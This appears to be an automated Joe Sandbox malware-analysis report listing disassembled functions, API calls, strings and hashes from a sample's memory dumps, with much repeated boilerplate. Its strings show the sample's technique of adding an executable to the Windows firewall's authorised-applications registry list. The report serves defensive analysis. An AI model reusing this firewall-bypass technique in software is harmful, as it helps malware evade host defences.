Similarity

API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:\WINDOWS\SYSTEM32\UXTHEME.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1567941233-768470111
Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction ID: a2306eb45bd12b3cf1f31dae531ea834411e708a2c53df72f2c5be9407347413
Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction Fuzzy Hash: 67E1DF7150825CBEEB25AF248C1ABFA7BAEEF41300F000559EE499E282D6F45F45CB65

Function 7FE30442 Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 281memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 7FE304CD
GetVersion.KERNEL32 ref: 7FE3050F
VirtualAlloc.KERNEL32(00000000,000065A4,08001000,00000040), ref: 7FE30537
CloseHandle.KERNEL32(?), ref: 7FE305BC

Strings

"'3, xrefs: 7FE30603
\BaseNamedObjects\rnxtVt, xrefs: 7FE30718, 7FE30735, 7FE30743
\BaseNamedObjects\rnxtVt, xrefs: 7FE30717
csrs, xrefs: 7FE30835

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: "'3$\BaseNamedObjects\rnxtVt$\BaseNamedObjects\rnxtVt$csrs
API String ID: 3017432202-1649617
Opcode ID: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction ID: bf6e148d40060bb9ff3a14a9286da860fd85a46fac5c7d6c15dd231958de371b
Opcode Fuzzy Hash: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction Fuzzy Hash: 95B16C31A05359FFEB619F20C809BED3BADEF4571AF900024EA0A9E181C7F1AB45CB55

Function 00479BFE Relevance: 33.7, APIs: 17, Strings: 2, Instructions: 487libraryloaderCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(0047CA63,00000104), ref: 00479C62
GetProcAddress.KERNEL32(00000000,00000002), ref: 00479C95
GetProcAddress.KERNEL32(00000000,00479D02), ref: 00479D0D
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00479D20
GetTickCount.KERNEL32 ref: 00479D54
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0047CEB7,00000000,00000000,00000000,00000000), ref: 00479E26
GetModuleFileNameA.KERNEL32(00000000,0047CA63,000000C8), ref: 00479EA3

Strings

ADVAPI32.DLL, xrefs: 00479D1F
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00479ECD

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1749273276-2287716718
Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction ID: 0caf1512084f6909fe528e66500acd055b66b89cdc83cc9e9e8307c4290dc43c
Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction Fuzzy Hash: 0302E471404248BFEB259F248C4ABEE3BACEF41314F04855EE94D9E182D6F85F45C7AA

Function 00479C83 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 432libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00479C7B), ref: 00479C83
GetProcAddress.KERNEL32(00000000,00000002), ref: 00479C95
GetProcAddress.KERNEL32(00000000,00479D02), ref: 00479D0D
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00479D20
GetTickCount.KERNEL32 ref: 00479D54

Strings

ADVAPI32.DLL, xrefs: 00479D1F
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00479ECD

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressProc$CountHandleLibraryLoadModuleTick
String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2837544101-2287716718
Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction ID: 2f53435e3539b5d7e81d95cbd58ad28af70cc7b35d97f5c79fd88c53db660623
Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction Fuzzy Hash: 73E1E471408248BFEB259F248C4ABEE7B6CEF41304F04855EE94D9E182D6F85F45C7AA

Function 00479CB1 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 409COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00479CA6), ref: 00479CB1
GetSystemDirectoryA.KERNEL32(0047CA63,00000104), ref: 00479CC8

Part of subcall function 00479CE0: lstrcatA.KERNEL32(0047CA63,00479CD3), ref: 00479CE1
Part of subcall function 00479CE0: GetProcAddress.KERNEL32(00000000,00479D02), ref: 00479D0D
Part of subcall function 00479CE0: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00479D20
Part of subcall function 00479CE0: GetTickCount.KERNEL32 ref: 00479D54
Part of subcall function 00479CE0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0047CEB7,00000000,00000000,00000000,00000000), ref: 00479E26

Strings

ADVAPI32.DLL, xrefs: 00479D1F
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00479ECD

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 215653160-2287716718
Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction ID: 30c04978753a016f3c63a52301ede1388b25670dbe57c9ea942064ea3509f5f8
Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction Fuzzy Hash: D7E1D071408248BFEB259F248C4ABEE3B6CEF41314F04855EE94D9E182D6F85F45C7AA

Function 00479CE0 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 389stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(0047CA63,00479CD3), ref: 00479CE1

Part of subcall function 00479CF7: LoadLibraryA.KERNEL32(00479CEC), ref: 00479CF7
Part of subcall function 00479CF7: GetProcAddress.KERNEL32(00000000,00479D02), ref: 00479D0D
Part of subcall function 00479CF7: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00479D20
Part of subcall function 00479CF7: GetTickCount.KERNEL32 ref: 00479D54
Part of subcall function 00479CF7: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0047CEB7,00000000,00000000,00000000,00000000), ref: 00479E26

Strings

ADVAPI32.DLL, xrefs: 00479D1F
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00479ECD

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2038497427-2287716718
Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction ID: 6dc48965cf2990a963407d4f576ca4f73e3c7876e142d36eef1b9abd61760eb0
Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction Fuzzy Hash: C8E1C171404258BFEB259F248C4ABEE3B6CEF41304F04855AED4D9E182D6F85F45C7AA

Function 00479CF7 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 379libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00479CEC), ref: 00479CF7

Part of subcall function 00479D0C: GetProcAddress.KERNEL32(00000000,00479D02), ref: 00479D0D
Part of subcall function 00479D0C: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00479D20
Part of subcall function 00479D0C: GetTickCount.KERNEL32 ref: 00479D54
Part of subcall function 00479D0C: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0047CEB7,00000000,00000000,00000000,00000000), ref: 00479E26

Strings

ADVAPI32.DLL, xrefs: 00479D1F
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00479ECD

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
